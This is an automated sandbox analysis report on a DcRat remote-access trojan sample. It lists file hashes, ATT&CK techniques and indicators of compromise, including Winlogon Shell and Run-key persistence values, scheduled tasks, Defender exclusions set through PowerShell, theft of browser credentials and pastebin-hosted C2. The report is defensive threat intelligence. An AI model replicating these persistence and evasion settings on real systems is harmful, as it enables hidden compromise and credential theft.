dcrat | b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240

Resubmissions

14-01-2025 04:21

250114-ey7b5swqav 10

14-01-2025 03:05

250114-dlfszsvmgw 10

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-01-2025 03:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Size

65.7MB
MD5

c9f4668c97eb480751e1bbf6173fc4e1
SHA1

528deade2bc88cafc26f78f7c73490b66abdf370
SHA256

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
SHA512

dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
SSDEEP

196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY

Score

10^/10

dcrat discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\", \"C:\\containerperf\\csrss.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\", \"C:\\containerperf\\csrss.exe\", \"C:\\containerperf\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\", \"C:\\containerperf\\csrss.exe\", \"C:\\containerperf\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\services.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\", \"C:\\containerperf\\csrss.exe\", \"C:\\containerperf\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\services.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\wininit.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\", \"C:\\containerperf\\csrss.exe\", \"C:\\containerperf\\dllhost.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\services.exe\", \"C:\\Program Files\\Windows Multimedia Platform\\wininit.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4592	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2844	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2852	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2956	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4532	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4148	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3720	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4140	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5100	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1688	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1636	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3428	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4360	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1084	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	2512	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1008	2512	schtasks.exe	92

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 4380 created 3472	4380	twain_32.exe	56
PID 4380 created 3472	4380	twain_32.exe	56
PID 4380 created 3472	4380	twain_32.exe	56
PID 4380 created 3472	4380	twain_32.exe	56
PID 4380 created 3472	4380	twain_32.exe	56
PID 4380 created 3472	4380	twain_32.exe	56
PID 4280 created 3472	4280	updater.exe	56
PID 4280 created 3472	4280	updater.exe	56
PID 4280 created 3472	4280	updater.exe	56
PID 4280 created 3472	4280	updater.exe	56
PID 4280 created 3472	4280	updater.exe	56
PID 4280 created 3472	4280	updater.exe	56
PID 4280 created 3472	4280	updater.exe	56

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1728	powershell.exe
5052	powershell.exe
2784	powershell.exe
3036	powershell.exe
5348	powershell.exe
1992	powershell.exe
3332	powershell.exe
4396	powershell.exe
2752	powershell.exe
4984	powershell.exe
3644	powershell.exe
400	powershell.exe
1696	powershell.exe
3968	powershell.exe
1692	powershell.exe
4948	powershell.exe
1988	powershell.exe
4764	powershell.exe
3964	powershell.exe
3980	powershell.exe
1472	powershell.exe
1060	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Astral private DLL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	ServerComponenthostMonitorDll.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe

Executes dropped EXE 5 IoCs

pid	Process
3480	Astral private DLL.exe
4380	twain_32.exe
4892	ServerComponenthostMonitorDll.exe
5604	dllhost.exe
4280	updater.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\containerperf\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Windows Multimedia Platform\\wininit.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\containerperf\\csrss.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\containerperf\\csrss.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\containerperf\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\services.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\services.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Windows Multimedia Platform\\wininit.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\dllhost.exe\""	ServerComponenthostMonitorDll.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
46	pastebin.com
45	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2080	powercfg.exe
2020	powercfg.exe
4244	powercfg.exe
4576	cmd.exe
6072	powercfg.exe
5092	powercfg.exe
1572	cmd.exe
4316	powercfg.exe
4080	powercfg.exe
4136	powercfg.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	\??\c:\Windows\System32\CSC42BBDE5C5DD497CBA9CA7C2A7BC9B6.TMP	csc.exe
File created	\??\c:\Windows\System32\hnaorh.exe	csc.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4380 set thread context of 1008	4380	twain_32.exe	181
PID 4280 set thread context of 1088	4280	updater.exe	203
PID 4280 set thread context of 4744	4280	updater.exe	211
PID 4280 set thread context of 4248	4280	updater.exe	212

Drops file in Program Files directory 9 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Multimedia Platform\wininit.exe	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Program Files\Windows Multimedia Platform\wininit.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Windows Multimedia Platform\56085415360792	ServerComponenthostMonitorDll.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain_32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\c5b4cb5e9653cc	ServerComponenthostMonitorDll.exe
File created	C:\Program Files (x86)\Reference Assemblies\dllhost.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files (x86)\Reference Assemblies\5940a34987c991	ServerComponenthostMonitorDll.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5700	sc.exe
2196	sc.exe
5132	sc.exe
4980	sc.exe
3716	sc.exe
1260	sc.exe
4176	sc.exe
3568	sc.exe
5548	sc.exe
5740	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Astral private DLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736824034"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={135192FF-D805-4E0D-B55C-F69E80226519}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	Astral private DLL.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	ServerComponenthostMonitorDll.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3900	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2852	schtasks.exe
2956	schtasks.exe
1688	schtasks.exe
2348	schtasks.exe
1084	schtasks.exe
1008	schtasks.exe
4532	schtasks.exe
1060	schtasks.exe
4140	schtasks.exe
4592	schtasks.exe
2844	schtasks.exe
4148	schtasks.exe
5100	schtasks.exe
3428	schtasks.exe
4360	schtasks.exe
3720	schtasks.exe
1636	schtasks.exe
1092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe
4892	ServerComponenthostMonitorDll.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4892	ServerComponenthostMonitorDll.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	5604	dllhost.exe
Token: SeDebugPrivilege	5348	powershell.exe
Token: SeDebugPrivilege	1008	dialer.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeShutdownPrivilege	4316	powercfg.exe
Token: SeCreatePagefilePrivilege	4316	powercfg.exe
Token: SeShutdownPrivilege	4080	powercfg.exe
Token: SeCreatePagefilePrivilege	4080	powercfg.exe
Token: SeShutdownPrivilege	2080	powercfg.exe
Token: SeCreatePagefilePrivilege	2080	powercfg.exe
Token: SeShutdownPrivilege	4136	powercfg.exe
Token: SeCreatePagefilePrivilege	4136	powercfg.exe
Token: SeIncreaseQuotaPrivilege	1472	powershell.exe
Token: SeSecurityPrivilege	1472	powershell.exe
Token: SeTakeOwnershipPrivilege	1472	powershell.exe
Token: SeLoadDriverPrivilege	1472	powershell.exe
Token: SeSystemProfilePrivilege	1472	powershell.exe
Token: SeSystemtimePrivilege	1472	powershell.exe
Token: SeProfSingleProcessPrivilege	1472	powershell.exe
Token: SeIncBasePriorityPrivilege	1472	powershell.exe
